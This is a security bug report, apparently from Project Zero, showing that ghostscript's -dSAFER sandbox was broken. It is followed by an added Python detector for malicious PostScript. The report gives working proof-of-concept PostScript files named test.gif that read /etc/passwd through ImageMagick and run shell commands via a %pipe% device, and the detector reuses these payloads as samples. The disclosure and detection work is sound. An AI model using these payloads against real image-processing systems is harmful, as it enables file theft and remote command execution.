ghostscript: -dSAFER stopped working
Reported by taviso@google.com (Project Member), Sep 29 2016
During a mailing list discussion I noticed that -dSAFER, a ghostscript parameter that is used when handling untrusted documents, was broken on RHEL, Debian and Ubuntu (maybe more). Some more investigation revealed that the bug was already fixed upstream, but because they never allocated a CVE or informed distributions about the security impact, many distributions didn't update. This could result in arbitrary file disclosure on systems that process pdf, ps, use ImageMagick or graphicsmagick, etc. You can easily imagine other complicated attacks on non-automated systems by modifying output based on file contents, etc, etc. The bug is already public, just recording here for reference.

Use of ghostscript as a backend with -dSAFER is extremely common: https://codesearch.debian.net/search?q=-dSAFER&perpkg=1

$ cat test.gif
%!PS
/Font /Helvetica-Bold findfont def
/FontSize 12 def
Font FontSize scalefont setfont
/dumpname {
    dup                         % copy filename
    dup                         % copy filename
    print                       % print filename
    (\n) print                  % print newline
    status                      % stat filename
    {
        (stat succeeded\n) print
        ( ctime:) print 64 string cvs print
        ( atime:) print 64 string cvs print
        ( size:) print 64 string cvs print
        ( blocks:) print 64 string cvs print
        (\n) print
        (\n) print
    }{
        (unable to stat\n\n) print
    } ifelse
    .libfile                    % open as library
    {
        (.libfile returned file\n\n) print
        64 string readstring pop % discard result (should probably test)
        dup                     % copy read string
        print                   % write to stdout
        % write to output
        newpath 0 0 moveto show showpage
        (\n) print
    }{
        (.libfile returned string\n) print
        print
        (\n) print
    } ifelse
} def
(/etc/passwd) /dumpname load 256 string filenameforall
$ convert test.gif png:test.png
<creates a file called test.png containing first line of /etc/passwd>
Comment 1 by taviso@google.com, Sep 29 2016

Comment, Sep 30 2016
Here's a more complete example test file.
$ cat test.gif
%!PS
/Size 20 def % font/line size
/Line 0 def % current line
/Buf 1024 string def % line buffer
/Path 0 newpath def
/Courier-Bold findfont Size scalefont setfont
1 1 1 setrgbcolor clippath fill % draw white background
0 0 0 setrgbcolor % set black foreground
(/etc/passwd) .libfile {
{
dup Buf readline
{
Path Line moveto show
}{
showpage
quit
} ifelse
% next line
/Line Line Size add def
} loop
} if
Comment, Sep 30 2016
I noticed a way to get command execution in version 9.18 and higher:

$ cat test.gif
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty) .putdeviceparams quit
$ convert test.gif png:test.png
uid=1000(taviso)

Should also work in evince, gimp, graphicsmagick, etc.
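A defensive input check, added here and not part of the original report or of ghostscript: it flags data bound for an ImageMagick/ghostscript pipeline that is really PostScript and uses the file and process operators the test files in this thread rely on (.libfile, status, filenameforall, %pipe% device names, .putdeviceparams). The sample inputs are constructed, modelled on the test.gif files above; the extra operators file, deletefile, renamefile and run are standard PostScript operators included for coverage.

```python
import re

# Operators the samples in this report use to reach the filesystem or a
# process; a working -dSAFER is expected to refuse them. file, deletefile,
# renamefile and run are standard PostScript operators added for coverage.
FILE_OPERATORS = {".libfile", "filenameforall", "status", ".putdeviceparams",
                  "file", "deletefile", "renamefile", "run"}
IMAGE_EXTS = {"gif", "png", "jpg", "jpeg", "bmp", "tif", "tiff"}

_STRING = re.compile(rb"\((?:\\.|[^\\)])*\)", re.S)   # (...) literals, no nesting
_COMMENT = re.compile(rb"%[^\r\n]*")                  # % to end of line
_TOKEN = re.compile(rb"[^\s()<>\[\]{}/]+")            # PostScript name tokens


def scan_postscript(data: bytes, claimed_ext: str = "") -> list:
    """Return findings for a blob about to be handed to gs via a converter."""
    findings = []
    # Pass 1: string literals, which is where %pipe% device names appear.
    for m in _STRING.finditer(data):
        body = m.group(0)[1:-1]
        if body.startswith(b"%pipe%"):
            findings.append(f"%pipe% device in string literal: {body[:40]!r}")
    # Pass 2: operator names, after blanking strings and comments so that
    # the word 'status' inside a message or a comment is not counted.
    stripped = _COMMENT.sub(b"", _STRING.sub(b"()", data))
    seen = set()
    for m in _TOKEN.finditer(stripped):
        tok = m.group(0).decode("latin-1")
        if tok in FILE_OPERATORS and tok not in seen:
            seen.add(tok)
            findings.append(f"file/process operator: {tok}")
    # A PostScript header, or any finding, under an image file name is a polyglot.
    looks_like_ps = data.lstrip().startswith(b"%!PS") or bool(findings)
    if looks_like_ps and claimed_ext.lower().lstrip(".") in IMAGE_EXTS:
        findings.append(f"PostScript content under image name .{claimed_ext} (polyglot)")
    return findings


# Constructed samples, modelled on the test.gif files in this report.
POLYGLOT_READ = (b"%!PS\n/Buf 1024 string def\n"
                 b"(/etc/passwd) .libfile { { dup Buf readline "
                 b"{ show }{ quit } ifelse } loop } if\n")
PIPE_EXEC = (b"currentdevice null true mark /OutputICCProfile "
             b"(%pipe%id > /dev/tty) .putdeviceparams quit\n")
BENIGN = (b"%!PS\n% check status of the font\n/Helvetica findfont 12 scalefont setfont\n"
          b"72 72 moveto (status: ok) show showpage\n")

if __name__ == "__main__":
    for name, blob in [("polyglot", POLYGLOT_READ), ("pipe", PIPE_EXEC), ("benign", BENIGN)]:
        print(name, scan_postscript(blob, "gif") or "clean")
```

A hit is a reason to reject the input or route it to a converter whose policy disables the PS coder entirely, rather than trusting -dSAFER on a build that may carry this bug.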